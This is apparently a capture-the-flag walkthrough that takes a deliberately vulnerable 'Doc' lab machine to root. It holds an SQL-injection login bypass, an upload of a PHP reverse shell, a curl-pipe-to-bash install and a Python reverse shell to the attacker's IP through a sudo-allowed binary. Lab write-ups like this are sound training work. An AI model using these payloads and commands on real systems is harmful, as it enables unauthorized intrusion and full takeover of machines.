Doc

When starting the machine, it displays its IP address.

We perform a scan using the NMAP tool to see which ports the target machine has open.

nmap -sCV -n -Pn 192.168.18.189 -oN target

And we observe that only port 80 is open. We access the website hosted on the target machine and observe the following:

We access the link labeled "Login," but it doesn't load because our machine doesn't recognize that domain.

What needs to be done is to save the domain doc.hmv in the /etc/hosts file, assigning it the IP address of the target machine.

sudo nano /etc/hosts

And we access it again.

I try certain things and manage to access it using a SQL Injection in the following way:

' or 1=1-- -

And we successfully gain access without any issues.

Now, I decide to perform directory enumeration using Wfuzz to see if there are any directories that could be useful to us.

wfuzz -c -u http://doc.hmv/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,200

The directory /uploads could be useful if we can upload files. I search, and indeed, we can.

So, we are going to download a PHP script that, when the file is uploaded, will send us a Reverse Shell, allowing us to access the machine.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -xf php-reverse-shell-1.0.tar.gz

We modify the information as instructed, and we're good to go.

For example, I'm going to upload the file to the following location:

If it doesn't work there, try uploading it in other locations.

And there you go, we're in the victim machine:

I set up the TTY session and enumerate the users on the machine.

There's a user named bella and the root user. Let's start with the initial privilege escalation.

While searching through the directories, I came across a PHP file named initialize.php that contains bella's password.

We access the bella user and obtain the user flag.

If we run "sudo -l", we can see the following:

We can execute the "doc" binary as root. Reading through the strings, you find that the binary creates a server on port 7890 when initiated.

strings /usr/bin/doc

We see that it creates a web server:

But since we can't access it through the browser, let's set up Port Forwarding to pass port 7890 from the victim machine to port 7890 on our local machine. We'll use Chisel for this. Download it to your local machine with the following command:

curl https://i.jpillora.com/chisel! | bash

And we also transfer the binary to the victim machine.

Local machine:

Victim machine:

And we give it permissions like this:

chmod +x chisel

Then we run Chisel with the following commands to set up Port Forwarding.

Local machine:

sudo chisel server --reverse -p 4444

Victim machine:

./chisel client 192.168.18.100:4444 R:7890:127.0.0.1:7890 &

And now we've opened the server, so searching for 127.0.0.1:7890 on our machine should display the hosted webpage.

As it's a Python module, it only displays what ends in .py. So, to confirm this, I'll create a file named abcd.py in /home/bella.

And now, it does show up. Additionally, we confirm that the second folder displayed is where we executed the server; previously it was /tmp, and now it's /home/bella. Next, we'll send a Reverse Shell as root.

First, we'll create a file that I'll call reverse.py with the following content:

import os
os.system("bash -c 'bash -i >& /dev/tcp/192.168.18.100/7777 0>&1'")

Then we run the doc binary as root:

sudo doc

We set up a listener on port 7777 on our local machine to receive the Reverse Shell.

nc -lvnp 7777

And now we access the web and click on the file we created (reverse.py).

Now that we have received the Reverse Shell and are the root user, we can obtain the root flag.

And the machine is completely hacked.

Last updated 11 months ago